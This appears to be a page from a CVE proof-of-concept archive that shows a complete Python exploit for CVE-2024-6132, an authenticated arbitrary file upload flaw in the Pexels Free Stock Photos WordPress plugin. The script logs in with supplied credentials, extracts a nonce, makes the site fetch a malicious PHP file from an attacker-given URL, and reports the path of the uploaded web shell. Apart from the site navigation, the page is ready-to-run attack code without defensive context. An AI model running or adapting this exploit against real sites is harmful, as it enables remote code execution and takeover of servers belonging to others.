4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-6132
README.md
Rendering markdown...
POC / CVE-2024-6132.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import re
import datetime

# EXPLOIT BY NXPLOIT - KHALED ALENAZI,

def initiate_session():
    return requests.Session()

def authenticate(session, url, username, password):
    login_url = f"{url}/wp-login.php"
    response = session.post(login_url, verify=False, data={
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": "Mozilla/5.0"})
    return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)

def extract_wpnonce(session, url):
    nonce_url = f"{url}/wp-admin/upload.php?page=pexels_fsp_images_settings"
    nonce_response = session.get(nonce_url)
    match = re.search(r"wpnonce: '([a-zA-Z0-9]+)'", nonce_response.text)
    return match.group(1) if match else None

def execute_exploit(session, url, shell_url, wpnonce):
    exploit_url = f"{url}/wp-admin/admin-ajax.php"
    payload = {
        "pexels_fsp_upload": "1",
        "image_url": shell_url,
        "image_src_page": "https://www.pexels.com/photo/black-usb-cable-on-white-and-red-box-7723388/",
        "image_user": "Tara Winstead",
        "q": "exploit",
        "wpnonce": wpnonce
    }
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Referer": f"{url}/wp-admin/upload.php?page=pexels_fsp_images_settings",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest"
    }
    return session.post(exploit_url, data=payload, headers=headers)

def extract_shell_path(response, url):
    match = re.search(r'([a-zA-Z0-9_]+\.php)', response.text)
    if not match:
        return None
    shell_filename = match.group(1)
    current_year = datetime.datetime.now().year
    current_month = datetime.datetime.now().month
    return f"{url}/wp-content/uploads/{current_year}/{current_month:02d}/{shell_filename}"

def main():
    parser = argparse.ArgumentParser(description="Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload | BY NXPLOIT - KHALED ALENAZI,")
    parser.add_argument("-u", "--url", required=True, help="WordPress site URL")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    parser.add_argument("-shell_url", "--shell_url", required=True, help="URL of the malicious PHP file")
    args = parser.parse_args()

    session = initiate_session()
    if not authenticate(session, args.url, args.username, args.password):
        print("[-] Failed to log in.")
        exit()
    print("[*] Successfully logged in.")

    wpnonce = extract_wpnonce(session, args.url)
    if not wpnonce:
        print("[-] Failed to extract wpnonce")
        exit()
    print(f"[*] Extracted wpnonce: {wpnonce}")

    response = execute_exploit(session, args.url, args.shell_url, wpnonce)
    if response.status_code == 200:
        print("[*] Malicious file might have been uploaded!")
        shell_path = extract_shell_path(response, args.url)
        if shell_path:
            print(f"[*] Shell uploaded successfully, path: {shell_path}")
        else:
            print("[-] Failed to locate the shell path.")
    else:
        print("[-] Exploit execution failed.")

if __name__ == "__main__":
    main()